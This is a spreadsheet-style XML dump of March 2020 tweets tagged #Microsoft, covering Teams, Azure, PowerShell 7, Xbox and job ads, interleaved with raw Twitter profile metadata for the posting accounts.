    <t>{'id': 1176511248751562752, 'id_str': '1176511248751562752', 'name': 'InsideTechWorld', 'screen_name': 'theITW', 'location': 'World', 'description': 'Latest news, updates and insides from the world of tech! ðŸŒŽâ¤µ\n#startups #entrepreneurs #reviews #apps #business #entertainment #follow #tech #news #trends', 'url': 'https://t.co/RMoLEFMnaP', 'entities': {'url': {'urls': [{'url': 'https://t.co/RMoLEFMnaP', 'expanded_url': 'http://www.insidetechworld.com', 'display_url': 'insidetechworld.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 18, 'friends_count': 68, 'listed_count': 0, 'created_at': 'Tue Sep 24 14:59:07 +0000 2019', 'favourites_count': 63, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 239, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1205645544149934080/EaiYg3ak_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1205645544149934080/EaiYg3ak_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1176511248751562752/1576278019',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</si>
  <si>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22:16:21 +0000 2020</t>
  </si>
  <si>
    <t>Create a meme-worthy animated GIF using a tool you already have in your arsenal: PowerPoint. Here's how to create your masterpiece.
 #Microsoft #Office365 #Tips #PowerPoint https://t.co/6sFaPjj9wq</t>
  </si>
  <si>
    <t>{'id': 2339320099, 'id_str': '2339320099', 'name': 'Weston Technology Solutions', 'screen_name': 'Weston_tech', 'location': 'Bend, OR', 'description': 'We build value for organizations by empowering people through technology. Serving our the Pacific Northwest since 1994', 'url': 'http://t.co/ZQKhi0aCWy', 'entities': {'url': {'urls': [{'url': 'http://t.co/ZQKhi0aCWy', 'expanded_url': 'http://www.weston-tech.com', 'display_url': 'weston-tech.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 7, 'listed_count': 0, 'created_at': 'Tue Feb 11 22:16:11 +0000 2014', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 475,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'http://pbs.twimg.com/profile_images/438043588606189568/z1JFDGXk_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/438043588606189568/z1JFDGXk_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2339320099/1565714694', 'profile_link_color': '326397',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</si>
  <si>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22:15:00 +0000 2020</t>
  </si>
  <si>
    <t>A Robust Mid-Market Accounting Solution with Just One Common Database to Manage https://t.co/z19xPF0Wtb
#Microsoft #PowerPlatform #MsPartner #PowerApps #MsDynComm #CRMMVP #ERP #CRM #Sales #Marketing #BetterTogether #Apps #QuickBooksEnterprise #QBE #TimeToUpgrade https://t.co/9pgrMLF17m</t>
  </si>
  <si>
    <t>Wed Mar 04 22:14:10 +0000 2020</t>
  </si>
  <si>
    <t>OneDrive Roadmap Roundup  February 2020 #Microsoft  https://t.co/PbqN9rw0su</t>
  </si>
  <si>
    <t>Wed Mar 04 22:09:48 +0000 2020</t>
  </si>
  <si>
    <t>"Our generation all have phones in their pockets, so Teams is the future." (Sindri Smarason, Cast House Operator, Alcoa). See how #Microsoft #Teams is providing a new generation of communication tools for a new generation of Alcoa workers. https://t.co/QQCJWLBNwN</t>
  </si>
  <si>
    <t>{'id': 340192078, 'id_str': '340192078', 'name': 'Cenetric Inc', 'screen_name': 'CenetricInc', 'location': 'Kansas City Metro Area', 'description': 'Cenetric is a new type of I.T. solutions provider focused on the highest level of customer service &amp; industry leading expertise.', 'url': 'http://t.co/khIPFH0el7', 'entities': {'url': {'urls': [{'url': 'http://t.co/khIPFH0el7', 'expanded_url': 'http://www.cenetric.com', 'display_url': 'cenetric.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 62, 'friends_count': 298, 'listed_count': 3, 'created_at': 'Fri Jul 22 08:49:08 +0000 2011', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 334,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'http://pbs.twimg.com/profile_images/806191360097124352/RjoWGZFk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/806191360097124352/RjoWGZFk_normal.jpg',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</si>
  <si>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22:08:38 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/5Pbh83jWqv</t>
  </si>
  <si>
    <t>Wed Mar 04 22:06:11 +0000 2020</t>
  </si>
  <si>
    <t>Two ways to open up new lines of communication for your business: 1. Deploy #Microsoft #Teams across your organization as the hub for teamwork in #Office365. 2. Subscribe now to this channel. Enable your digital workspace by doing both. https://t.co/qQYjl2A1H8</t>
  </si>
  <si>
    <t>{'id': 29261664, 'id_str': '29261664', 'name': 'The Amaral Group', 'screen_name': 'theamaralgroup', 'location': 'Cambridge, MA &amp; Charleston, SC', 'description': 'Leading IT products and services consultants. Serving all industries and businesses in the Eastern U.S. We make IT work for you. Call us today!', 'url': 'http://t.co/BSJUxXDF46', 'entities': {'url': {'urls': [{'url': 'http://t.co/BSJUxXDF46', 'expanded_url': 'http://www.amaral.com', 'display_url': 'amaral.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 82, 'friends_count': 160, 'listed_count': 30, 'created_at': 'Mon Apr 06 18:34:51 +0000 2009', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6575, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '4CA0FF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/666454758299832320/8V3Zfwh5_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/666454758299832320/8V3Zfwh5_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/29261664/1557156728', 'profile_link_color': '1F98C7',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</si>
  <si>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Wed Mar 04 22:05:40 +0000 2020</t>
  </si>
  <si>
    <t>How a connected #Microsoft #Azure ecosystem helps Ignition Ai compete with blazing-fast real-time analytics and built-in #security. https://t.co/iZnVdI6xnU</t>
  </si>
  <si>
    <t>{'id': 717776599161126912, 'id_str': '717776599161126912', 'name': 'WheelHouse IT', 'screen_name': 'WheelHouseIT', 'location': 'United States', 'description': 'Welcome to the WheelHouse! We are 4 Corner IT, AE Technology Group, Bluwater Technologies, Untanged Solutions, &amp; Whole IT. Business IT support across the U.S.', 'url': 'https://t.co/wGOHqyF7Dy', 'entities': {'url': {'urls': [{'url': 'https://t.co/wGOHqyF7Dy', 'expanded_url': 'https://www.wheelhouseit.com', 'display_url': 'wheelhouseit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 921, 'friends_count': 2065, 'listed_count': 8, 'created_at': 'Wed Apr 06 18:10:51 +0000 2016', 'favourites_count': 47, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1812,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'http://pbs.twimg.com/profile_images/1059442045838876674/h5LXxEXF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1059442045838876674/h5LXxEXF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/717776599161126912/1576698125', 'profile_link_color': '516D7C',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</si>
  <si>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22:05:10 +0000 2020</t>
  </si>
  <si>
    <t>Enabling IKEv2 fragmentation support for #Windows 10 Always On #VPN. #Microsoft #Windows10 #Win10 #WinServ #aovpn #mobility https://t.co/Hp88sbtV56</t>
  </si>
  <si>
    <t>Wed Mar 04 22:03:27 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #microsoft     Who doesn't want to streamline accounting, better manage costs, and connect with customers? Excellent article on #growthhacks for small businesses. Check it out here:     #Microsoft #Technology #IT #BusinessAutomation https://t.co/5KrauG32tA</t>
  </si>
  <si>
    <t>Wed Mar 04 22:03:10 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Carnival Cruise Line Operator Discloses Potential Data Breach:" https://t.co/QjBpjDJWof
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Wed Mar 04 22:00:46 +0000 2020</t>
  </si>
  <si>
    <t>Hashtag Trending - iPhones in India; Amazon driver layoffs; Microsoft cancels IoT in Action https://t.co/G9RsJURxSw
#HashtagTrending #iPhones #India #Amazon #layoffs #Microsoft #IoT</t>
  </si>
  <si>
    <t>{'id': 26839061, 'id_str': '26839061', 'name': 'Technicity', 'screen_name': 'TechnicityTO', 'location': 'Toronto', 'description': '#TechnicityTO is an event in December that highlights the leadership role the City of Toronto has taken to embrace technology to enhance services.', 'url': 'https://t.co/VsVgrHbM3j', 'entities': {'url': {'urls': [{'url': 'https://t.co/VsVgrHbM3j', 'expanded_url': 'http://technicity.ca', 'display_url': 'technicity.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 613, 'friends_count': 373, 'listed_count': 34, 'created_at': 'Thu Mar 26 20:18:08 +0000 2009', 'favourites_count': 1238, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1780, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '608B79', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1065604202087383040/2tE0olgq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1065604202087383040/2tE0olgq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/26839061/1447433023', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '323835', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Hashtag Trending  iPhones in India; Amazon driver layoffs; Microsoft cancels IoT in Action https://t.co/BuXt4IKoSx
#HashtagTrending #iPhones #India #Amazon #layoffs #Microsoft #IoT</t>
  </si>
  <si>
    <t>Wed Mar 04 22:00:11 +0000 2020</t>
  </si>
  <si>
    <t>#SharePoint: 5 Features That Are In and Out
https://t.co/7EEZ5bsG7f
#microsoft #teamcollaboration #collaboration #msoffice</t>
  </si>
  <si>
    <t>{'id': 37674885, 'id_str': '37674885', 'name': 'Nextplane Inc.', 'screen_name': 'NextPlane', 'location': 'Silicon Valley, CA', 'description': 'NextPlane forges truly productive communication in a modern business world by breaking down barriers to comprehensive collaboration.', 'url': 'http://t.co/bM489VjgFp', 'entities': {'url': {'urls': [{'url': 'http://t.co/bM489VjgFp', 'expanded_url': 'http://www.nextplane.net', 'display_url': 'nextplane.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4969, 'friends_count': 787, 'listed_count': 50, 'created_at': 'Mon May 04 14:51:34 +0000 2009', 'favourites_count': 979, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2921,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'http://pbs.twimg.com/profile_images/865262142039048193/pzdYUeX__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/865262142039048193/pzdYUeX__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/37674885/1570554794', 'profile_link_color': 'ABB8C2',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</si>
  <si>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22:00:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #BI #Solutions #Architect  #Permanent Position in #Downtown, #Vancouver: https://t.co/L6OGtgKpJp #IT #jobs #career #employment #ignite #tech #ignitetechnical</t>
  </si>
  <si>
    <t>{'id': 33650952, 'id_str': '33650952', 'name': 'ignitetechnical', 'screen_name': 'ignitetechnical', 'location': 'Vancouver', 'description': 'An Information Technology resourcing firm placing technical candidates in Vancouver. We are built around three principles: speed, efficiency and quality.', 'url': 'http://t.co/FVJxAc1bVa', 'entities': {'url': {'urls': [{'url': 'http://t.co/FVJxAc1bVa', 'expanded_url': 'http://ignitetechnical.com/', 'display_url': 'ignitetechnical.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2012, 'friends_count': 1473, 'listed_count': 669, 'created_at': 'Mon Apr 20 20:29:47 +0000 2009', 'favourites_count': 24, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 43053,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'http://pbs.twimg.com/profile_images/1030115700168216577/wRAmxEgL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1030115700168216577/wRAmxEgL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/33650952/1533939718', 'profile_link_color': '82D200', 'profile_sidebar_border_color': 'E9F7D4', 'profile_sidebar_fill_color': 'E9F7D4', 'profile_text_color': '515254', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 21:59:31 +0000 2020</t>
  </si>
  <si>
    <t>ULTIMATE NEWS  POCKET
https://t.co/aS10nzGGgg
#halo #ps2 #xbox #xbox360 #xboxone #xboxones #xboxonex #xboxlive #xboxgamepass #microsoft #playstation #ps4 #steam #pc #console #jogos #games #game #gaming #gamedev #videogames #videogame #gamer #gamers #gamingcommunity https://t.co/GAaFrWauRl</t>
  </si>
  <si>
    <t>{'id': 1197821058608517120, 'id_str': '1197821058608517120', 'name': 'PC CONSOLE ULTIMATE', 'screen_name': 'pcconsole_pro', 'location': '', 'description': '', 'url': 'https://t.co/EARZsD0FxY', 'entities': {'url': {'urls': [{'url': 'https://t.co/EARZsD0FxY', 'expanded_url': 'https://www.instagram.com/pcconsoleultimate/', 'display_url': 'instagram.com/pcconsoleultimâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Fri Nov 22 10:16:18 +0000 2019', 'favourites_count': 1,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'http://pbs.twimg.com/profile_images/1197825822893191169/kmCX0rEs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1197825822893191169/kmCX0rEs_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1197821058608517120/1574419702',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</si>
  <si>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21:58:49 +0000 2020</t>
  </si>
  <si>
    <t>#PowerShell7 is live and GA #Microsoft @PowerShell_Team BIG THX for Team
https://t.co/X9FL8cDlX3</t>
  </si>
  <si>
    <t>{'id': 861148815402958848, 'id_str': '861148815402958848', 'name': 'MichaÅ‚ Machniak', 'screen_name': 'MichalMachniak', 'location': 'Polska', 'description': 'MCT/MCSA/MCSE, Microsoft Specialist ... Admin form begin of life :) â€¦ long live Admins !', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 50, 'friends_count': 221, 'listed_count': 1, 'created_at': 'Sun May 07 09:20:51 +0000 2017', 'favourites_count': 569, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 219,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'http://pbs.twimg.com/profile_images/861155149204647936/8qQy4RJc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/861155149204647936/8qQy4RJc_normal.jpg',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</si>
  <si>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21:58:24 +0000 2020</t>
  </si>
  <si>
    <t>Are you experienced with #Azure, #Exchange, #SharePoint, #Cyber, Open Source and/or .NET? Consider joining us! Learn more about open opportunities at #Microsoft #careersintech #microsoftadvocate #msftadvocate https://t.co/mIiIXi6rVN</t>
  </si>
  <si>
    <t>{'id': 2773486636, 'id_str': '2773486636', 'name': 'Pamela Joy Rosenberg', 'screen_name': 'Res4Life', 'location': 'Greater Philadelphia Area', 'description': 'Recruiter who loves social media and connecting with people.   Always happy to network with digital sales, advertising and marketing professionals nationwide.', 'url': 'https://t.co/quAkiUDcvL', 'entities': {'url': {'urls': [{'url': 'https://t.co/quAkiUDcvL', 'expanded_url': 'http://www.gannett.com', 'display_url': 'gannett.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 214, 'friends_count': 780, 'listed_count': 48, 'created_at': 'Wed Sep 17 12:35:30 +0000 2014', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1192,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'http://pbs.twimg.com/profile_images/512630375559221249/jLNjrrHN_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/512630375559221249/jLNjrrHN_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2773486636/1416922435',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</si>
  <si>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21:52:34 +0000 2020</t>
  </si>
  <si>
    <t>Evil private businesses can never be trusted to do good...  (sarcasm). '#Microsoft, #Google, #LogMeIn, and #Cisco are offering free licenses to their meeting, collaboration, and remote work tools' via @LawrenceAbrams @BleepinComputer #COVID #COVID2019  https://t.co/I82fjDz11o</t>
  </si>
  <si>
    <t>{'id': 953759424950210560, 'id_str': '953759424950210560', 'name': 'Boxer Orwell', 'screen_name': 'BoxerOrwell', 'location': 'United States', 'description': "'I didn't put you in a prison... I just showed you the bars... The door to the cage is open... All the blindfolds are gone.'", 'url': 'https://t.co/9HQfjdRZZq', 'entities': {'url': {'urls': [{'url': 'https://t.co/9HQfjdRZZq', 'expanded_url': 'https://medium.com/@BoxerOrwell', 'display_url': 'medium.com/@BoxerOrwell', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 711, 'friends_count': 1151, 'listed_count': 4, 'created_at': 'Wed Jan 17 22:42:21 +0000 2018', 'favourites_count': 8391, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6432,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'http://pbs.twimg.com/profile_images/1231671357852856320/uDqz8H8p_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231671357852856320/uDqz8H8p_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/953759424950210560/1557677137',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</si>
  <si>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21:52:10 +0000 2020</t>
  </si>
  <si>
    <t>Three major manufacturers are joining #Microsoft and Germanys BMW Group in an open source initiative to make the most of 5G technology in industrial processes. https://t.co/3sUR0AbVkS</t>
  </si>
  <si>
    <t>{'id': 84413592, 'id_str': '84413592', 'name': 'Toolbox for IT', 'screen_name': 'ToolboxforIT', 'location': 'Tempe, AZ', 'description': "We're an online community for #IT professionals, providing discussion groups, blogs, research and networking for 2+ million members.", 'url': 'http://t.co/Fgs2VR94FV', 'entities': {'url': {'urls': [{'url': 'http://t.co/Fgs2VR94FV', 'expanded_url': 'http://it.toolbox.com', 'display_url': 'it.toolbox.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3780, 'friends_count': 2211, 'listed_count': 299, 'created_at': 'Thu Oct 22 20:12:48 +0000 2009', 'favourites_count': 733, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14655,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'http://pbs.twimg.com/profile_images/938854365175070720/5-E8tfCD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/938854365175070720/5-E8tfCD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/84413592/1512675375',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</si>
  <si>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Wed Mar 04 21:52:06 +0000 2020</t>
  </si>
  <si>
    <t>Working remotely during challenging times
. 
. 
. 
 #microsoft #office #teams #remotework https://t.co/qdVKc4ENw6</t>
  </si>
  <si>
    <t>{'id': 13328452, 'id_str': '13328452', 'name': 'Gabo', 'screen_name': 'El_Gabo', 'location': 'Lima', 'description': '#digital #marketing #media #ecommerce #tech #geek #online #foodie #games #microsoft #latam #PerÃº #Mexico \nOjo, mis opiniones. \nY muy enamorado de @ErikaTestino', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 815, 'friends_count': 740, 'listed_count': 101, 'created_at': 'Mon Feb 11 00:53:14 +0000 2008', 'favourites_count': 16167, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 24312,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'http://pbs.twimg.com/profile_images/1225902676816297984/F169gGoe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225902676816297984/F169gGoe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/13328452/1581113050', 'profile_link_color': '107C0F',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</si>
  <si>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Wed Mar 04 21:50:28 +0000 2020</t>
  </si>
  <si>
    <t>The first Xbox Series X gameplay footage might finally be revealed this week  https://t.co/CJDLvBX52l #Microsoft #Xbox #XboxSeriesX #Gaming</t>
  </si>
  <si>
    <t>{'id': 1155145640, 'id_str': '1155145640', 'name': 'Ð¼Î¹zÏ…ÑÑƒâ„¢', 'screen_name': 'MizureX5', 'location': 'New York, NY', 'description': '24 | Professional Nerd | CyberSecurity | Military Enthusiast | Investor | Networking | { Coding } | Graphic Designer | @Lytrox @Rxload_', 'url': 'https://t.co/T0v0kAUX43', 'entities': {'url': {'urls': [{'url': 'https://t.co/T0v0kAUX43', 'expanded_url': 'https://www.behance.net/Mizury', 'display_url': 'behance.net/Mizury', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2671, 'friends_count': 2422, 'listed_count': 219, 'created_at': 'Wed Feb 06 21:24:37 +0000 2013', 'favourites_count': 295244, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18311,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'http://pbs.twimg.com/profile_images/1211777708235132929/FEFFnLXg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1211777708235132929/FEFFnLXg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1155145640/1566767999',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</si>
  <si>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21:50:10 +0000 2020</t>
  </si>
  <si>
    <t>Tech that persist despite better alternatives:
1. QWERTY keyboard
- #Dvorak keyboard is more efficient
2. Cylinder batteries
- #Microsoft #instaLoad batteries can be inserted anyway u like
Any others?
#Humans = #CreaturesOfHabit
#technology #TECH4ALL #uxdesign
#technologies</t>
  </si>
  <si>
    <t>{'id': 281124491, 'id_str': '281124491', 'name': 'Scott [ðŸ‘] Bryan', 'screen_name': 'ScottDBryan', 'location': 'Newsletter sign up ðŸ‘‰', 'description': 'Designer ðŸ’» Writerâœï¸ Father ðŸ‘¨\u200dðŸ‘©\u200dðŸ‘¦\u200dðŸ‘¦ Bicycler ðŸš´ðŸ»\u200dâ™‚ï¸                  Writing about re-aligning tech with people. ðŸ¤–ðŸ˜Š', 'url': 'https://t.co/f0lQQh4xPV', 'entities': {'url': {'urls': [{'url': 'https://t.co/f0lQQh4xPV', 'expanded_url': 'http://www.scott-bryan.com/join', 'display_url': 'scott-bryan.com/join', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 81, 'friends_count': 10, 'listed_count': 6, 'created_at': 'Tue Apr 12 17:50:10 +0000 2011', 'favourites_count': 131, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 324,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'http://pbs.twimg.com/profile_images/1224806040878960640/joDGiw7C_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224806040878960640/joDGiw7C_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/281124491/1580833697',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</si>
  <si>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21:49:57 +0000 2020</t>
  </si>
  <si>
    <t>Can you run @FortniteGame  on the @surface Pro 4 i5 8GB RAM ? Check it out now ! 
https://t.co/j9YJXF7JjX
#Youtube #YouTubers #Surface #Microsoft #SurfacePro #Fortnite #FortniteChapter2Season2 #FortniteSeason2 https://t.co/urUQbqHpG8</t>
  </si>
  <si>
    <t>{'id': 1578181212, 'id_str': '1578181212', 'name': 'Sirius Monkey', 'screen_name': 'Sirius_Monkey', 'location': '', 'description': 'Hello ! \nI am starting a small Youtube channel where I share tech and gaming reviews. \nFeel free to check it out :)', 'url': 'https://t.co/MOjVXXkN8C', 'entities': {'url': {'urls': [{'url': 'https://t.co/MOjVXXkN8C', 'expanded_url': 'http://youtube.com/c/SiriusMonkeyTech', 'display_url': 'youtube.com/c/SiriusMonkeyâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 30, 'listed_count': 0, 'created_at': 'Mon Jul 08 17:36:55 +0000 2013', 'favourites_count': 35, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1032947891323711489/GMhRD1Jf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1032947891323711489/GMhRD1Jf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1578181212/1565205623',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</si>
  <si>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21:46:27 +0000 2020</t>
  </si>
  <si>
    <t>@JenMsft I've never used Chrome, always Opera. I was upset when #Microsoft said they'd integrate the two. I tried it, liked it, use it heavily. I use it in large corp env. &amp;amp; across personal devices using @bing as my search tool.</t>
  </si>
  <si>
    <t>{'id': 326957350, 'id_str': '326957350', 'name': 'Chris "I don\'t apologise" Winters', 'screen_name': 'SorryNoFocus', 'location': 'Los Angeles, Ca.', 'description': 'Addicted to neuropozyne. Ex-tv/film. Love sci-fi, #Win10, &amp; h4cking. 1st Novel: Invisible War https://t.co/SiTSm3vM3j', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/SiTSm3vM3j', 'expanded_url': 'https://www.amazon.com/gp/product/0998020915/ref=dbs_a_def_rwt_bibl_vppi_i0', 'display_url': 'amazon.com/gp/product/099â€¦', 'indices': [94, 117]}]}}, 'protected': False, 'followers_count': 674, 'friends_count': 1077, 'listed_count': 16, 'created_at': 'Thu Jun 30 19:24:24 +0000 2011', 'favourites_count': 2033, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4261,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'http://pbs.twimg.com/profile_images/1234707348167331842/7ZkIR57f_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234707348167331842/7ZkIR57f_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/326957350/1422084706',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</si>
  <si>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Wed Mar 04 21:46:15 +0000 2020</t>
  </si>
  <si>
    <t>Nice! Now thats exciting to end the day reading. 
#powershell #microsoft #scripting #windows #technology #IT #automation  https://t.co/BxWcS9Wo76</t>
  </si>
  <si>
    <t>{'id': 19828517, 'id_str': '19828517', 'name': 'ð™³ðšŽðšŠðš— ð™°ðš–ðš’ðš›ðš’ðšðš’ðšœ', 'screen_name': 'deanfx', 'location': 'Fort Myers, FL', 'description': 'â‡¢ Owner of https://t.co/gltzLbnXOC | â‡¢ Former Founder of https://t.co/9yHzIeB8aG | â‡¢ Tech Enthusiast | â‡¢ Father | â‡¢ Nerd', 'url': 'https://t.co/qngEvh1l2e', 'entities': {'url': {'urls': [{'url': 'https://t.co/qngEvh1l2e', 'expanded_url': 'http://www.aselectfew.com', 'display_url': 'aselectfew.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/gltzLbnXOC', 'expanded_url': 'http://aselectfew.com', 'display_url': 'aselectfew.com', 'indices': [11, 34]}, {'url': 'https://t.co/9yHzIeB8aG', 'expanded_url': 'http://Servemine.com', 'display_url': 'Servemine.com', 'indices': [57, 80]}]}}, 'protected': False, 'followers_count': 1358, 'friends_count': 1180, 'listed_count': 26, 'created_at': 'Sat Jan 31 19:51:59 +0000 2009', 'favourites_count': 7436, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 16517,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'http://pbs.twimg.com/profile_images/1169109181938524160/jcEmL220_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1169109181938524160/jcEmL220_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19828517/1581181405', 'profile_link_color': '1B95E0',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</si>
  <si>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Wed Mar 04 21:46:01 +0000 2020</t>
  </si>
  <si>
    <t>#ICYMI Announcing preview of Backup Reports https://t.co/8EWdWw5c7c #Azure #Cloud #Microsoft</t>
  </si>
  <si>
    <t>{'id': 77639094, 'id_str': '77639094', 'name': 'Josh Luedeman', 'screen_name': 'JoshLuedeman', 'location': 'Orlando, Florida', 'description': '@Microsoft Employee | Sr Engineer | Azure Engineering CXP | #Cloud Architect | #Docker, #OSS, &amp; #Kubernetes Enthusiast | My tweets, views, &amp; opinions are my own', 'url': 'https://t.co/Ff7NLAIWke', 'entities': {'url': {'urls': [{'url': 'https://t.co/Ff7NLAIWke', 'expanded_url': 'http://www.joshluedeman.com', 'display_url': 'joshluedeman.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1313, 'friends_count': 794, 'listed_count': 155, 'created_at': 'Sun Sep 27 02:35:23 +0000 2009', 'favourites_count': 3294, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12564,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'http://pbs.twimg.com/profile_images/1138623311422939137/bxLaprrp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1138623311422939137/bxLaprrp_normal.jpg', 'profile_banner_url': 